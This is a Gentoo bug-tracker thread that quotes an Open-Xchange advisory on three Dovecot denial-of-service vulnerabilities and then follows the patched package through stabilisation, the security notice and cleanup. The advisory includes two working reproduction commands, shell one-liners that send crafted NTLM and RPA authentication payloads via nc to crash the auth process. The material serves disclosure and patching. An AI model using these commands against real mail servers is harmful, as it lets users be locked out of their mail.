Incoming details.
Open-Xchange Security Advisory 2020-08-12 Affected product: Dovecot IMAP server Internal reference: DOP-1849 (Bug ID) Vulnerability type: Uncontrolled recursion (CWE-674) Vulnerable version: 2.0 Vulnerable component: submission, lmtp, lda Fixed version: 2.3.11.3 Report confidence: Confirmed Solution status: Fix available Vendor notification: 2020-04-23 CVE reference: CVE-2020-12100 CVSS: 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) Vulnerability Details: Receiving mail with deeply nested MIME parts leads to resource exhaustion as Dovecot attempts to parse it. Risk: Malicious actor can cause denial of service to mail delivery by repeatedly sending mails with bad content. Workaround: Limit MIME structures in MTA. Solution: Upgrade to fixed version. Affected product: Dovecot IMAP server Internal reference: DOP-1870 (Bug ID) Vulnerability type: CWE-789 (Uncontrolled Memory Allocation) Vulnerable version: 2.2 Vulnerable component: auth Fixed version: 2.3.11.3 Report confidence: Confirmed Solution status: Fix available Vendor notification: 2020-05-03 CVE reference: CVE-2020-12673 CVSS: 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) Vulnerability Details: Dovecot's NTLM implementation does not correctly check message buffer size, which leads to reading past allocation which can lead to crash. Risk: An adversary can use this vulnerability to crash dovecot auth process repeatedly, preventing login. Steps to reproduce: (echo 'AUTH NTLM'; echo -ne 'NTLMSSP\x00\x01\x00\x00\x00\x00\x02\x00\x00AAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAA' | \ base64 -w0 ;echo ;echo -ne 'NTLMSSP\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0 0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00AA\x00\x00\x41\x00\ x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ x00\x00\x02\x00\x00orange\x00'| \ base64 -w0;echo ; echo QUIT) | nc 127.0.0.1 110 Workaround: Disable NTLM authentication. Solution: Upgrade to fixed version. Affected product: Dovecot IMAP server Internal reference: DOP-1869 (Bug ID) Vulnerability type: CWE-126 (Buffer over-read) Vulnerable version: 2.2 Vulnerable component: auth Fixed version: 2.3.11.3 Report confidence: Confirmed Solution status: Fix available Vendor notification: 2020-05-03 Researcher credit: Orange from DEVCORE team CVE reference: CVE-2020-12674 CVSS: 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) Vulnerability Details: Dovecot's RPA mechanism implementation accepts zero-length message, which leads to assert-crash later on Risk: An adversary can use this vulnerability to crash dovecot auth process repeatedly, preventing login. Steps to reproduce: (echo 'AUTH RPA'; echo -ne '\x60\x11\x06\x09\x60\x86\x48\x01\x86\xf8\x73\x01\x01\x01\x00\x04\x00\x 00\x01' | base64 -w 0; echo ; echo -ne '\x60\x11\x06\x09\x60\x86\x48\x01\x86\xf8\x73\x01\x01\x00\x03A@A\x00' | base64 -w 0; echo ; echo QUIT) | nc 127.0.0.1 110 Workaround: Disable RPA authentication. Solution: Upgrade to fixed version.
The bug has been referenced in the following commit(s): https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=4cffab4e4790734f6acdd76ca5d9112eb13ac019 commit 4cffab4e4790734f6acdd76ca5d9112eb13ac019 Author: Eray Aslan <eras@gentoo.org> AuthorDate: 2020-08-14 09:16:48 +0000 Commit: Eray Aslan <eras@gentoo.org> CommitDate: 2020-08-14 09:16:48 +0000 net-mail/dovecot: security bump to 2.3.11.3 Bug: https://bugs.gentoo.org/736617 Package-Manager: Portage-3.0.2, Repoman-2.3.23 Signed-off-by: Eray Aslan <eras@gentoo.org> net-mail/dovecot/Manifest | 2 + net-mail/dovecot/dovecot-2.3.11.3.ebuild | 288 +++++++++++++++++++++++++++++++ 2 files changed, 290 insertions(+)
Arches, please test and mark stable =net-mail/dovecot-2.3.11.3 Target Keywords = ~alpha amd64 arm ~hppa ~ia64 ~mips ppc ppc64 s390 ~sparc x86
amd64 done
ppc64 done
x86 stable
New GLSA request filed.
This issue was resolved and addressed in GLSA 202009-02 at https://security.gentoo.org/glsa/202009-02 by GLSA coordinator Thomas Deutschmann (whissi).
Re-opening for remaining architectures.
-r1 stabled for arm (with USE=unwind, all but dodgy backtrace tests pass).
ppc stable
s390 done all arches done
Please cleanup.
Resetting sanity check; keywords are not fully specified and arches are not CC-ed.
The bug has been referenced in the following commit(s): https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=dfc1038d3efd30e4ecab68e957e68a84606175c7 commit dfc1038d3efd30e4ecab68e957e68a84606175c7 Author: Eray Aslan <eras@gentoo.org> AuthorDate: 2020-12-21 14:20:28 +0000 Commit: Eray Aslan <eras@gentoo.org> CommitDate: 2020-12-21 14:20:28 +0000 net-mail/dovecot: partial security cleanup Bug: https://bugs.gentoo.org/736617 Package-Manager: Portage-3.0.12, Repoman-3.0.2 Signed-off-by: Eray Aslan <eras@gentoo.org> net-mail/dovecot/Manifest | 4 - net-mail/dovecot/dovecot-2.3.10.1.ebuild | 288 ------------------------------ net-mail/dovecot/dovecot-2.3.7.2.ebuild | 291 ------------------------------- 3 files changed, 583 deletions(-)
The bug has been referenced in the following commit(s): https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=c9c810739029ebce491020ab8d319b7330aa168e commit c9c810739029ebce491020ab8d319b7330aa168e Author: Eray Aslan <eras@gentoo.org> AuthorDate: 2020-12-21 14:29:38 +0000 Commit: Eray Aslan <eras@gentoo.org> CommitDate: 2020-12-21 14:35:58 +0000 package.mask: mask vulnerable dovecot version masked instead of removing until mail-filter/dovecot_deleted_to_trash is treecleaned to prevent tree breakage (bugs #756217) Bug: https://bugs.gentoo.org/736617 Signed-off-by: Eray Aslan <eras@gentoo.org> profiles/package.mask | 6 ++++++ 1 file changed, 6 insertions(+)
The bug has been referenced in the following commit(s): https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=340756b94cf702eeb0aa29f3ecef649cf226bb80 commit 340756b94cf702eeb0aa29f3ecef649cf226bb80 Author: Eray Aslan <eras@gentoo.org> AuthorDate: 2021-01-21 08:35:23 +0000 Commit: Eray Aslan <eras@gentoo.org> CommitDate: 2021-01-21 08:36:58 +0000 net-mail/dovecot: remove vulnerable version. cleanup done Bug: https://bugs.gentoo.org/736617 Package-Manager: Portage-3.0.14, Repoman-3.0.2 Signed-off-by: Eray Aslan <eras@gentoo.org> net-mail/dovecot/Manifest | 2 - net-mail/dovecot/dovecot-2.2.36.4.ebuild | 287 --------------------- .../dovecot/files/dovecot-userdb-passwd-fix.patch | 18 -- 3 files changed, 307 deletions(-)
All done!